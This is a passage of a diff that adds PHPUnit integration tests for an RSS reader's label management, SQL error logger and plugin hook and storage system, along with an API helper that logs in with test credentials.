+
+        $pdo = Db::pdo();
+        $pdo->beginTransaction();
+        try {
+            $pdo->exec($seedSql);
+            $pdo->commit();
+        } catch (\Throwable $e) {
+            $pdo->rollBack();
+            throw $e;
+        }
+    }
+
+    /**
+     * Send an API request and return the decoded response.
+     *
+     * @param array<mixed> $payload
+     * @return array<mixed>|null
+     */
+    protected function api(array $payload) : ?array {
+        $ch = curl_init($this->api_url);
+
+        $payload["sid"] = $this->sid;
+
+        curl_setopt($ch, CURLOPT_HEADER, false);
+        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-type: application/json"]);
+        curl_setopt($ch, CURLOPT_POST, true);
+        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
+
+        $resp = curl_exec($ch);
+
+        $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
+
+        if ($status != 200) {
+            print("error: failed with HTTP status: $status");
+            return null;
+        }
+
+        curl_close($ch);
+
+        $resp_json = json_decode($resp, true);
+
+        if (!$resp_json) {
+            print_r($resp);
+            return null;
+        }
+
+        if ($resp_json['status'] != 0) {
+            print_r($resp_json);
+
+            return null;
+        }
+
+        return $resp_json;
+    }
+
+    /**
+     * Assert that a response has a valid content block without errors.
+     *
+     * @param array<mixed> $resp
+     */
+    protected function common_assertions(array $resp) : void {
+        $this->assertArrayHasKey("content", $resp);
+        $this->assertArrayNotHasKey("error", $resp['content'], $resp['content']['error'] ?? '');
+    }
+
+    /**
+     * Authenticate with the API and store the session ID.
+     */
+    protected function login() : void {
+        $resp = $this->api(["op" => "login", "user" => "test", "password" => "test"]);
+
+        $this->common_assertions($resp);
+
+        $this->assertArrayHasKey("session_id", $resp['content']);
+        $this->sid = $resp['content']['session_id'];
+    }
+
+    protected function getSid() : string {
+        return $this->sid;
+    }
+}

--- a/tests_integration/LabelsIntegrationTest.php
+++ b/tests_integration/LabelsIntegrationTest.php
@@ -1,0 +1,431 @@
+<?php
+/** @group integration */
+final class LabelsIntegrationTest extends DbTestCase {
+
+    /**
+     * Helper: get the count of rows in ttrss_user_labels2.
+     */
+    private function countUserLabels(int $labelId, int $articleId): int {
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            'SELECT COUNT(*) FROM ttrss_user_labels2 WHERE label_id = ? AND article_id = ?');
+        $sth->execute([$labelId, $articleId]);
+        return (int) $sth->fetchColumn();
+    }
+
+    /**
+     * Helper: get the label_cache for a user entry.
+     */
+    private function getLabelCache(int $refId, int $ownerUid = 1): string {
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            'SELECT label_cache FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?');
+        $sth->execute([$refId, $ownerUid]);
+        $row = $sth->fetch();
+        return $row ? $row['label_cache'] : '';
+    }
+
+    // ── find_id() ─────────────────────────────────────────────────────────────
+
+    public function test_find_id_existing_label(): void {
+        // seed.sql inserts label id=1 with caption 'test-label-1'
+        $id = Labels::find_id('test-label-1', 1);
+        $this->assertEquals(1, $id, 'Should find the label by exact caption');
+    }
+
+    public function test_find_id_non_existing_label(): void {
+        $id = Labels::find_id('nonexistent-label', 1);
+        $this->assertEquals(0, $id, 'Should return 0 for a label that does not exist');
+    }
+
+    public function test_find_id_case_insensitive(): void {
+        // seed has 'test-label-1'
+        $idUpper = Labels::find_id('TEST-LABEL-1', 1);
+        $idMixed = Labels::find_id('Test-Label-1', 1);
+        $idLower = Labels::find_id('test-label-1', 1);
+
+        $this->assertEquals(1, $idUpper, 'Uppercase should find the label');
+        $this->assertEquals(1, $idMixed, 'Mixed case should find the label');
+        $this->assertEquals(1, $idLower, 'Lowercase should find the label');
+    }
+
+    public function test_find_id_different_owner(): void {
+        // seed data is for uid=1; uid=999 has no labels
+        $id = Labels::find_id('test-label-1', 999);
+        $this->assertEquals(0, $id, 'Should not find label for a different owner');
+    }
+
+    // ── find_caption() ────────────────────────────────────────────────────────
+
+    public function test_find_caption_existing(): void {
+        $caption = Labels::find_caption(1, 1);
+        $this->assertEquals('test-label-1', $caption);
+    }
+
+    public function test_find_caption_non_existing(): void {
+        $caption = Labels::find_caption(9999, 1);
+        $this->assertEquals('', $caption);
+    }
+
+    public function test_find_caption_different_owner(): void {
+        $caption = Labels::find_caption(1, 999);
+        $this->assertEquals('', $caption);
+    }
+
+    // ── get_all() ─────────────────────────────────────────────────────────────
+
+    public function test_get_all_returns_seed_labels(): void {
+        $labels = Labels::get_all(1);
+        $this->assertCount(2, $labels);
+    }
+
+    public function test_get_all_ordered_by_caption(): void {
+        $labels = Labels::get_all(1);
+        // Seed: 'test-label-1' (id=1), 'test-label-2' (id=2)
+        // Alphabetically: 'test-label-1' < 'test-label-2'
+        $this->assertEquals('test-label-1', $labels[0]['caption']);
+        $this->assertEquals('test-label-2', $labels[1]['caption']);
+    }
+
+    public function test_get_all_empty_for_nonexistent_owner(): void {
+        $labels = Labels::get_all(9999);
+        $this->assertEmpty($labels);
+    }
+
+    public function test_get_all_includes_color_fields(): void {
+        $labels = Labels::get_all(1);
+        $this->assertArrayHasKey('id', $labels[0]);
+        $this->assertArrayHasKey('caption', $labels[0]);
+        $this->assertArrayHasKey('fg_color', $labels[0]);
+        $this->assertArrayHasKey('bg_color', $labels[0]);
+    }
+
+    // ── get_as_hash() ─────────────────────────────────────────────────────────
+
+    public function test_get_as_hash_returns_associative_array(): void {
+        $hash = Labels::get_as_hash(1);
+        $this->assertCount(2, $hash);
+    }
+
+    public function test_get_as_hash_keys_are_ids(): void {
+        $hash = Labels::get_as_hash(1);
+        $this->assertArrayHasKey(1, $hash);
+        $this->assertArrayHasKey(2, $hash);
+    }
+
+    public function test_get_as_hash_values_match_get_all(): void {
+        $hash = Labels::get_as_hash(1);
+        $all = Labels::get_all(1);
+
+        foreach ($all as $label) {
+            $id = (int) $label['id'];
+            $this->assertArrayHasKey($id, $hash);
+            $this->assertEquals($label, $hash[$id]);
+        }
+    }
+
+    // ── create() ──────────────────────────────────────────────────────────────
+
+    public function test_create_new_label(): void {
+        $result = Labels::create('integration-test-label', '#ff0000', '#000000');
+        $this->assertEquals(1, $result, 'Should return 1 row inserted');
+
+        // Verify it exists in the database
+        $id = Labels::find_id('integration-test-label', 1);
+        $this->assertGreaterThan(0, $id, 'Label should be findable after creation');
+
+        // Clean up
+        Labels::remove($id, 1);
+    }
+
+    public function test_create_label_with_default_colors(): void {
+        $result = Labels::create('minimal-label');
+        $this->assertEquals(1, $result);
+
+        $id = Labels::find_id('minimal-label', 1);
+        $caption = Labels::find_caption($id, 1);
+        $this->assertEquals('minimal-label', $caption);
+
+        // Clean up
+        Labels::remove($id, 1);
+    }
+
+    public function test_create_duplicate_label_returns_false(): void {
+        // seed has 'test-label-1'
+        $result = Labels::create('test-label-1');
+        $this->assertFalse($result, 'Creating a duplicate label should return false');
+    }
+
+    public function test_create_duplicate_label_case_insensitive(): void {
+        // seed has 'test-label-1'
+        $result = Labels::create('TEST-LABEL-1');
+        $this->assertFalse($result, 'Duplicate check should be case-insensitive');
+    }
+
+    public function test_create_different_owner(): void {
+        // The test database only has uid=1 (admin). Creating for other UIDs
+        // would require additional seed data, so we verify that uid=1 works
+        // and that the owner_uid parameter is correctly passed through.
+        $result = Labels::create('owner-1-label', '#00ff00', '#ffffff', 1);
+        $this->assertEquals(1, $result, 'Should create label for uid=1');
+
+        $id = Labels::find_id('owner-1-label', 1);
+        $this->assertGreaterThan(0, $id);
+
+        // Verify uid=999 cannot see it
+        $idForUid999 = Labels::find_id('owner-1-label', 999);
+        $this->assertEquals(0, $idForUid999);
+
+        // Clean up
+        Labels::remove($id, 1);
+    }
+
+    // ── remove() ──────────────────────────────────────────────────────────────
+
+    public function test_remove_existing_label(): void {
+        // Create a label to remove
+        $result = Labels::create('to-be-removed', '#ff0000', '#ffffff');
+        $this->assertEquals(1, $result);
+        $id = Labels::find_id('to-be-removed', 1);
+        $this->assertGreaterThan(0, $id);
+
+        // Remove it
+        Labels::remove($id, 1);
+
+        // Verify it's gone
+        $caption = Labels::find_caption($id, 1);
+        $this->assertEquals('', $caption, 'Label should be removed from DB');
+    }
+
+    public function test_remove_cleans_label_cache(): void {
+        // Create a label
+        $result = Labels::create('cache-test-label', '#ff0000', '#ffffff');
+        $this->assertEquals(1, $result);
+        $id = Labels::find_id('cache-test-label', 1);
+        $this->assertGreaterThan(0, $id);
+
+        // Set a label_cache on an article
+        $pdo = Db::pdo();
+        $pdo->exec("UPDATE ttrss_user_entries SET label_cache = '{\"test\":true}' WHERE ref_id = 1 AND owner_uid = 1");
+
+        // Verify cache was set
+        $cache = $this->getLabelCache(1);
+        $this->assertNotEmpty($cache);
+
+        // Remove the label — should clear all caches for uid=1
+        Labels::remove($id, 1);
+
+        // Verify cache was cleared
+        $cacheAfter = $this->getLabelCache(1);
+        $this->assertEquals('', $cacheAfter, 'Removing a label should clear label_cache');
+
+        // Clean up: recreate the label and clear cache again
+        $pdo->exec("UPDATE ttrss_user_entries SET label_cache = '' WHERE ref_id = 1 AND owner_uid = 1");
+    }
+
+    public function test_remove_nonexistent_label(): void {
+        // Should not throw — removing a non-existent label is a no-op
+        $this->expectNotToPerformAssertions();
+        Labels::remove(99999, 1);
+    }
+
+    // ── add_article() ─────────────────────────────────────────────────────────
+
+    public function test_add_article_to_existing_label(): void {
+        // seed has label id=1, caption='test-label-1'
+        // seed has article ref_id=1
+
+        Labels::add_article(1, 'test-label-1', 1);
+
+        $count = $this->countUserLabels(1, 1);
+        $this->assertEquals(1, $count, 'Should have one entry in ttrss_user_labels2');
+
+        // Verify label_cache was cleared
+        $cache = $this->getLabelCache(1);
+        $this->assertEquals('', $cache, 'add_article should clear label_cache');
+    }
+
+    public function test_add_article_to_nonexistent_label(): void {
+        // Label 'nonexistent' does not exist, so find_id returns 0
+        // and add_article returns early without modifying anything
+        $initialCount = $this->countUserLabels(0, 1);
+
+        Labels::add_article(1, 'nonexistent-label', 1);
+
+        $count = $this->countUserLabels(0, 1);
+        $this->assertEquals($initialCount, $count, 'Should not add anything for nonexistent label');
+    }
+
+    public function test_add_article_is_idempotent(): void {
+        Labels::add_article(1, 'test-label-1', 1);
+        $count1 = $this->countUserLabels(1, 1);
+
+        Labels::add_article(1, 'test-label-1', 1);
+        $count2 = $this->countUserLabels(1, 1);
+
+        $this->assertEquals($count1, $count2, 'Adding same label twice should not create duplicates');
+    }
+
+    public function test_add_article_different_article(): void {
+        Labels::add_article(1, 'test-label-1', 1);
+        $count1 = $this->countUserLabels(1, 1);
+
+        Labels::add_article(2, 'test-label-1', 1);
+        $count2 = $this->countUserLabels(1, 2);
+
+        $this->assertEquals(1, $count1, 'Article 1 should have the label');
+        $this->assertEquals(1, $count2, 'Article 2 should have the label');
+    }
+
+    // ── remove_article() ──────────────────────────────────────────────────────
+
+    public function test_remove_article_from_existing_label(): void {
+        // First add the label relation
+        Labels::add_article(1, 'test-label-1', 1);
+        $countBefore = $this->countUserLabels(1, 1);
+        $this->assertEquals(1, $countBefore);
+
+        // Now remove it
+        Labels::remove_article(1, 'test-label-1', 1);
+
+        $countAfter = $this->countUserLabels(1, 1);
+        $this->assertEquals(0, $countAfter, 'Article should be removed from label');
+    }
+
+    public function test_remove_article_nonexistent_relation(): void {
+        // Removing a label relation that doesn't exist should be a no-op
+        $initialCount = $this->countUserLabels(1, 9999);
+        Labels::remove_article(9999, 'test-label-1', 1);
+        $finalCount = $this->countUserLabels(1, 9999);
+        $this->assertEquals($initialCount, $finalCount);
+    }
+
+    public function test_remove_article_clears_cache(): void {
+        // Add a label to article 1
+        Labels::add_article(1, 'test-label-1', 1);
+
+        // Manually set a label_cache
+        $pdo = Db::pdo();
+        $pdo->exec("UPDATE ttrss_user_entries SET label_cache = '{\"test\":true}' WHERE ref_id = 1 AND owner_uid = 1");
+
+        // Remove the label
+        Labels::remove_article(1, 'test-label-1', 1);
+
+        // Cache should be cleared
+        $cache = $this->getLabelCache(1);
+        $this->assertEquals('', $cache, 'remove_article should clear label_cache');
+    }
+
+    // ── clear_cache() ─────────────────────────────────────────────────────────
+
+    public function test_clear_cache_clears_label_cache(): void {
+        // Set a label_cache
+        $pdo = Db::pdo();
+        $pdo->exec("UPDATE ttrss_user_entries SET label_cache = '{\"test\":true}' WHERE ref_id = 1 AND owner_uid = 1");
+
+        $cacheBefore = $this->getLabelCache(1);
+        $this->assertNotEmpty($cacheBefore);
+
+        // Clear it
+        Labels::clear_cache(1);
+
+        $cacheAfter = $this->getLabelCache(1);
+        $this->assertEquals('', $cacheAfter);
+    }
+
+    public function test_clear_cache_nonexistent_article(): void {
+        // Should not throw even if article doesn't exist
+        $this->expectNotToPerformAssertions();
+        Labels::clear_cache(99999);
+    }
+
+    // ── update_cache() ────────────────────────────────────────────────────────
+
+    public function test_update_cache_force_mode(): void {
+        // Force mode first clears the cache, then repopulates from the
+        // article's actual labels (via Article::_get_labels). Since article
+        // 1 has no labels in ttrss_user_labels2, the result is an empty array.
+        $pdo = Db::pdo();
+        $pdo->exec("UPDATE ttrss_user_entries SET label_cache = '{\"existing\":true}' WHERE ref_id = 1 AND owner_uid = 1");
+
+        $cacheBefore = $this->getLabelCache(1);
+        $this->assertNotEmpty($cacheBefore);
+
+        // Force clear — should clear and then repopulate from DB (empty)
+        Labels::update_cache(1, 1, [], true);
+
+        $cacheAfter = $this->getLabelCache(1);
+        // The cache is repopulated from the article's actual labels.
+        // Since article 1 has no labels, it becomes an empty array '[]'.
+        $this->assertEquals('[]', $cacheAfter, 'Force mode should clear stale cache and repopulate from DB');
+    }
+
+    public function test_update_cache_with_labels(): void {
+        // Labels format: [[label_id, caption, fg_color, bg_color], ...]
+        // phpcs:ignore PhanTypeMismatchArgument -- Labels::update_cache() accepts this format
+        $labels = [[1, 'test-label-1', '#ff0000', '#ffffff']];
+        // @phpstan-ignore-next-line
+        Labels::update_cache(1, 1, $labels, false);
+
+        $cache = $this->getLabelCache(1);
+        $this->assertNotEmpty($cache, 'Cache should be set');
+
+        $decoded = json_decode($cache, true);
+        $this->assertIsArray($decoded);
+        // Format is [[label_id, caption, fg_color, bg_color], ...]
+        $this->assertCount(1, $decoded);
+        $this->assertEquals(1, $decoded[0][0], 'First element should be label_id');
+        $this->assertEquals('test-label-1', $decoded[0][1], 'Second element should be caption');
+    }
+
+    public function test_update_cache_empty_labels(): void {
+        // Set a label_cache first
+        $pdo = Db::pdo();
+        $pdo->exec("UPDATE ttrss_user_entries SET label_cache = '{\"existing\":true}' WHERE ref_id = 1 AND owner_uid = 1");
+
+        // Update with empty labels (no force) — should not change anything
+        Labels::update_cache(1, 1, [], false);
+
+        $cache = $this->getLabelCache(1);
+        $this->assertNotEmpty($cache, 'Empty labels without force should not modify cache');
+    }
+
+    // ── Cross-cutting: label and article relationship ─────────────────────────
+
+    public function test_full_label_lifecycle(): void {
+        // 1. Create a new label
+        $result = Labels::create('lifecycle-test', '#0000ff', '#ffffff');
+        $this->assertEquals(1, $result);
+
+        // 2. Find it
+        $id = Labels::find_id('lifecycle-test', 1);
+        $this->assertGreaterThan(0, $id);
+
+        // 3. Get its caption
+        $caption = Labels::find_caption($id, 1);
+        $this->assertEquals('lifecycle-test', $caption);
+
+        // 4. It appears in get_all
+        $all = Labels::get_all(1);
+        $found = false;
+        foreach ($all as $label) {
+            if ((int) $label['id'] === $id && $label['caption'] === 'lifecycle-test') {
+                $found = true;
+                break;
+            }
+        }
+        $this->assertTrue($found, 'New label should appear in get_all()');
+
+        // 5. Add it to an article
+        Labels::add_article(1, 'lifecycle-test', 1);
+        $this->assertEquals(1, $this->countUserLabels($id, 1));
+
+        // 6. Remove it from the article
+        Labels::remove_article(1, 'lifecycle-test', 1);
+        $this->assertEquals(0, $this->countUserLabels($id, 1));
+
+        // 7. Remove the label entirely
+        Labels::remove($id, 1);
+        $this->assertEquals('', Labels::find_caption($id, 1));
+    }
+}

--- a/tests_integration/LoggerSqlTest.php
+++ b/tests_integration/LoggerSqlTest.php
@@ -1,0 +1,264 @@
+<?php
+/** @group integration */
+final class LoggerSqlTest extends DbTestCase {
+
+    protected function setUp(): void {
+        parent::setUp();
+        // Ensure SQL logging is enabled
+        Config::set(Config::LOG_DESTINATION, Logger::LOG_DEST_SQL);
+        // Reset singleton so new adapter is created
+        $this->resetLoggerSingleton();
+    }
+
+    protected function tearDown(): void {
+        $this->resetLoggerSingleton();
+        parent::tearDown();
+    }
+
+    private function resetLoggerSingleton(): void {
+        $ref = new ReflectionClass(Logger::class);
+        $prop = $ref->getProperty('instance');
+        $prop->setAccessible(true);
+        $prop->setValue(null, null);
+    }
+
+    public function test_sql_adapter_logs_error(): void {
+        $adapter = new Logger_SQL();
+        $result = $adapter->log_error(
+            E_WARNING,
+            "Test SQL error message",
+            "test_sql.php",
+            42,
+            "Test context for SQL logging"
+        );
+
+        $this->assertTrue($result);
+
+        // Verify the error was written to the database
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT id, errno, errstr, filename, lineno, context FROM ttrss_error_log
+             WHERE errstr = 'Test SQL error message' AND filename = 'test_sql.php'
+             ORDER BY id DESC LIMIT 1"
+        );
+        $sth->execute();
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row);
+        $this->assertEquals(2, (int) $row['errno']); // E_WARNING
+        $this->assertEquals("Test SQL error message", $row['errstr']);
+        $this->assertEquals("test_sql.php", $row['filename']);
+        $this->assertEquals(42, (int) $row['lineno']);
+        $this->assertStringContainsString("Test context for SQL logging", $row['context']);
+    }
+
+    public function test_sql_adapter_logs_user_error(): void {
+        $adapter = new Logger_SQL();
+        $result = $adapter->log_error(
+            E_USER_ERROR,
+            "User error in SQL adapter test",
+            "user_error_test.php",
+            100,
+            "User error context"
+        );
+
+        $this->assertTrue($result);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT id, errno, errstr FROM ttrss_error_log
+             WHERE errstr = 'User error in SQL adapter test'
+             ORDER BY id DESC LIMIT 1"
+        );
+        $sth->execute();
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row);
+        $this->assertEquals(256, (int) $row['errno']); // E_USER_ERROR
+    }
+
+    public function test_sql_adapter_context_max_length(): void {
+        $longContext = str_repeat("x", 20000); // Well over 8192 chars
+        $adapter = new Logger_SQL();
+        $result = $adapter->log_error(
+            E_NOTICE,
+            "Long context test",
+            "long_ctx.php",
+            1,
+            $longContext
+        );
+
+        $this->assertTrue($result);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT context FROM ttrss_error_log
+             WHERE errstr = 'Long context test'
+             ORDER BY id DESC LIMIT 1"
+        );
+        $sth->execute();
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row);
+        // Context should be truncated to 8192 chars
+        $this->assertLessThanOrEqual(8192, mb_strlen($row['context']));
+    }
+
+    public function test_sql_adapter_includes_server_params(): void {
+        // Set a fake server param to verify it's included in context
+        $_SERVER['HTTP_X_REAL_IP'] = '192.168.1.100';
+        $_SERVER['HTTP_X_FORWARDED_FOR'] = '10.0.0.1';
+
+        $adapter = new Logger_SQL();
+        $result = $adapter->log_error(
+            E_NOTICE,
+            "Server params test",
+            "server_params.php",
+            5,
+            "Base context"
+        );
+
+        $this->assertTrue($result);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT context FROM ttrss_error_log
+             WHERE errstr = 'Server params test'
+             ORDER BY id DESC LIMIT 1"
+        );
+        $sth->execute();
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row);
+        $this->assertStringContainsString("Base context", $row['context']);
+        $this->assertStringContainsString("Real IP: 192.168.1.100", $row['context']);
+        $this->assertStringContainsString("Forwarded For: 10.0.0.1", $row['context']);
+
+        // Clean up
+        unset($_SERVER['HTTP_X_REAL_IP']);
+        unset($_SERVER['HTTP_X_FORWARDED_FOR']);
+    }
+
+    public function test_sql_adapter_logs_different_error_levels(): void {
+        $adapter = new Logger_SQL();
+
+        $errorLevels = [
+            E_ERROR,
+            E_WARNING,
+            E_PARSE,
+            E_CORE_ERROR,
+            E_COMPILE_ERROR,
+            E_USER_ERROR,
+            E_USER_WARNING,
+            E_USER_NOTICE,
+            E_STRICT,
+            E_DEPRECATED,
+            E_USER_DEPRECATED,
+        ];
+
+        foreach ($errorLevels as $errno) {
+            $name = Logger::ERROR_NAMES[$errno];
+            $result = $adapter->log_error(
+                $errno,
+                "Error level test: $name",
+                "error_levels.php",
+                10,
+                ""
+            );
+            $this->assertTrue($result, "Failed to log error level $name");
+        }
+
+        // Verify all errors were logged
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT COUNT(*) as cnt FROM ttrss_error_log
+             WHERE errstr LIKE 'Error level test:%' AND filename = 'error_levels.php'"
+        );
+        $sth->execute();
+        $row = $sth->fetch();
+        $this->assertEquals(count($errorLevels), (int) $row['cnt']);
+    }
+
+    public function test_sql_adapter_with_unicode(): void {
+        $unicodeStr = "Unicode error: café résumé naïve 日本語 中文";
+        $adapter = new Logger_SQL();
+        $result = $adapter->log_error(
+            E_WARNING,
+            $unicodeStr,
+            "unicode_test.php",
+            1,
+            "Unicode context: ñ ü ö ä"
+        );
+
+        $this->assertTrue($result);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT errstr, context FROM ttrss_error_log
+             WHERE errstr = ? AND filename = 'unicode_test.php'
+             ORDER BY id DESC LIMIT 1"
+        );
+        $sth->execute([$unicodeStr]);
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row);
+        $this->assertEquals($unicodeStr, $row['errstr']);
+        $this->assertStringContainsString("Unicode context", $row['context']);
+    }
+
+    public function test_sql_adapter_with_empty_context(): void {
+        $adapter = new Logger_SQL();
+        $result = $adapter->log_error(
+            E_NOTICE,
+            "Empty context test",
+            "empty_ctx.php",
+            1,
+            ""
+        );
+
+        $this->assertTrue($result);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT context FROM ttrss_error_log
+             WHERE errstr = 'Empty context test'
+             ORDER BY id DESC LIMIT 1"
+        );
+        $sth->execute();
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row);
+        // Context may or may not have server params depending on environment;
+        // just verify the row was created with a valid context field
+        $this->assertIsString($row['context']);
+    }
+
+    public function test_sql_adapter_uses_current_timestamp(): void {
+        $adapter = new Logger_SQL();
+        $result = $adapter->log_error(
+            E_NOTICE,
+            "Timestamp test",
+            "timestamp.php",
+            1,
+            ""
+        );
+
+        $this->assertTrue($result);
+
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT created_at FROM ttrss_error_log
+             WHERE errstr = 'Timestamp test'
+             ORDER BY id DESC LIMIT 1"
+        );
+        $sth->execute();
+        $row = $sth->fetch();
+
+        $this->assertNotNull($row);
+        // created_at should be a valid datetime
+        $this->assertMatchesRegularExpression(
+            '/^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$/',
+            $row['created_at']
+        );
+    }
+}

--- a/tests_integration/PluginHostTest.php
+++ b/tests_integration/PluginHostTest.php
@@ -1,0 +1,455 @@
+<?php
+/** @group integration */
+final class PluginHostTest extends DbTestCase {
+
+    /**
+     * Create a fresh PluginHost instance for isolated testing.
+     * Each test gets its own instance so the global singleton is never touched.
+     */
+    private function createHost(): PluginHost {
+        $host = new PluginHost();
+
+        $ref = new ReflectionClass($host);
+        $uidProp = $ref->getProperty('owner_uid');
+        $uidProp->setAccessible(true);
+        $uidProp->setValue($host, 1);
+
+        return $host;
+    }
+
+    // ── Singleton ──
+
+    public function test_get_instance_returns_same_object(): void {
+        $host1 = PluginHost::getInstance();
+        $host2 = PluginHost::getInstance();
+        $this->assertSame($host1, $host2);
+    }
+
+    // ── Hook system ──
+
+    public function test_add_hook_and_get_hooks(): void {
+        $plugin = new TestPluginHook();
+        $host = $this->createHost();
+
+        $host->add_hook(PluginHost::HOOK_ARTICLE_BUTTON, $plugin, 50);
+
+        $hooks = $host->get_hooks(PluginHost::HOOK_ARTICLE_BUTTON);
+
+        $this->assertCount(1, $hooks);
+        $this->assertSame($plugin, $hooks[0]);
+    }
+
+    public function test_add_hook_respects_priority_order(): void {
+        $pluginLow = new TestPluginHook();
+        $pluginHigh = new TestPluginHook();
+        $host = $this->createHost();
+
+        $host->add_hook(PluginHost::HOOK_ARTICLE_BUTTON, $pluginLow, 90);
+        $host->add_hook(PluginHost::HOOK_ARTICLE_BUTTON, $pluginHigh, 10);
+
+        $hooks = $host->get_hooks(PluginHost::HOOK_ARTICLE_BUTTON);
+
+        $this->assertSame($pluginHigh, $hooks[0]);
+        $this->assertSame($pluginLow, $hooks[1]);
+    }
+
+    public function test_del_hook_removes_plugin(): void {
+        $plugin = new TestPluginHook();
+        $host = $this->createHost();
+
+        $host->add_hook(PluginHost::HOOK_ARTICLE_BUTTON, $plugin, 50);
+        $host->del_hook(PluginHost::HOOK_ARTICLE_BUTTON, $plugin);
+
+        $hooks = $host->get_hooks(PluginHost::HOOK_ARTICLE_BUTTON);
+        $this->assertCount(0, $hooks);
+    }
+
+    public function test_run_hooks_invokes_all(): void {
+        $plugin1 = new TestPluginHook();
+        $plugin2 = new TestPluginHook();
+        $host = $this->createHost();
+
+        $host->add_hook(PluginHost::HOOK_ARTICLE_BUTTON, $plugin1, 50);
+        $host->add_hook(PluginHost::HOOK_ARTICLE_BUTTON, $plugin2, 60);
+
+        $host->run_hooks(PluginHost::HOOK_ARTICLE_BUTTON);
+
+        $this->assertTrue($plugin1->hookCalled);
+        $this->assertTrue($plugin2->hookCalled);
+    }
+
+    public function test_run_hooks_until_stops_on_match(): void {
+        $plugin1 = new TestPluginHook();
+        $plugin2 = new TestPluginHook();
+        $host = $this->createHost();
+
+        $plugin1->hookReturn = true; // first plugin returns true
+
+        $host->add_hook(PluginHost::HOOK_ARTICLE_FILTER, $plugin1, 50);
+        $host->add_hook(PluginHost::HOOK_ARTICLE_FILTER, $plugin2, 60);
+
+        $host->run_hooks_until(PluginHost::HOOK_ARTICLE_FILTER, true);
+
+        $this->assertTrue($plugin1->hookCalled);
+        // plugin2 should not be called because plugin1 returned true (the check value)
+        $this->assertFalse($plugin2->hookCalled);
+    }
+
+    public function test_run_hooks_callback_stops_on_true(): void {
+        $plugin1 = new TestPluginHook();
+        $plugin2 = new TestPluginHook();
+        $host = $this->createHost();
+
+        $plugin1->hookReturn = 'stop'; // first plugin returns 'stop'
+
+        $host->add_hook(PluginHost::HOOK_ARTICLE_FILTER, $plugin1, 50);
+        $host->add_hook(PluginHost::HOOK_ARTICLE_FILTER, $plugin2, 60);
+
+        $host->run_hooks_callback(PluginHost::HOOK_ARTICLE_FILTER, function($result) {
+            return $result === 'stop';
+        });
+
+        $this->assertTrue($plugin1->hookCalled);
+        $this->assertFalse($plugin2->hookCalled);
+    }
+
+    public function test_get_hooks_returns_empty_for_unknown_hook(): void {
+        $host = $this->createHost();
+        // @phpstan-ignore argument.type (testing behavior with an unknown hook string)
+        $hooks = $host->get_hooks('nonexistent_hook');
+        $this->assertCount(0, $hooks);
+    }
+
+    // ── Plugin storage (DB-backed) ──
+
+    public function test_set_and_get(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->set($plugin, 'key1', 'value1');
+
+        $this->assertEquals('value1', $host->get($plugin, 'key1'));
+    }
+
+    public function test_get_returns_default_when_missing(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $this->assertFalse($host->get($plugin, 'missing_key', false));
+        $this->assertEquals('default', $host->get($plugin, 'missing_key', 'default'));
+    }
+
+    public function test_set_array(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->set_array($plugin, ['a' => 1, 'b' => 2, 'c' => 3]);
+
+        $this->assertEquals(1, $host->get($plugin, 'a'));
+        $this->assertEquals(2, $host->get($plugin, 'b'));
+        $this->assertEquals(3, $host->get($plugin, 'c'));
+    }
+
+    public function test_get_array(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->set($plugin, 'mylist', ['x' => 10, 'y' => 20]);
+
+        $result = $host->get_array($plugin, 'mylist');
+        $this->assertEquals(['x' => 10, 'y' => 20], $result);
+
+        // Non-array returns default
+        $host->set($plugin, 'notarray', 'string');
+        $this->assertEquals(['default'], $host->get_array($plugin, 'notarray', ['default']));
+    }
+
+    public function test_get_all(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->set($plugin, 'k1', 'v1');
+        $host->set($plugin, 'k2', 'v2');
+
+        $all = $host->get_all($plugin);
+        $this->assertArrayHasKey('k1', $all);
+        $this->assertArrayHasKey('k2', $all);
+        $this->assertEquals('v1', $all['k1']);
+        $this->assertEquals('v2', $all['k2']);
+    }
+
+    public function test_clear_data_removes_from_db(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->set($plugin, 'to_remove', 'value');
+        $host->clear_data($plugin);
+
+        $this->assertFalse($host->get($plugin, 'to_remove', false));
+
+        // Verify it's gone from DB
+        $pdo = Db::pdo();
+        $row = $pdo->prepare("SELECT count(*) FROM ttrss_plugin_storage WHERE name = ? AND owner_uid = ?");
+        $row->execute([get_class($plugin), 1]);
+        $this->assertEquals(0, (int) $row->fetchColumn());
+    }
+
+    // ── Command system ──
+
+    public function test_add_command_and_get_commands(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->add_command('my_command', 'A test command', $plugin);
+        $host->add_command('another', 'Another cmd', $plugin);
+
+        $commands = $host->get_commands();
+
+        $this->assertArrayHasKey('my_command', $commands);
+        $this->assertArrayHasKey('another', $commands);
+        $this->assertEquals('A test command', $commands['my_command']['description']);
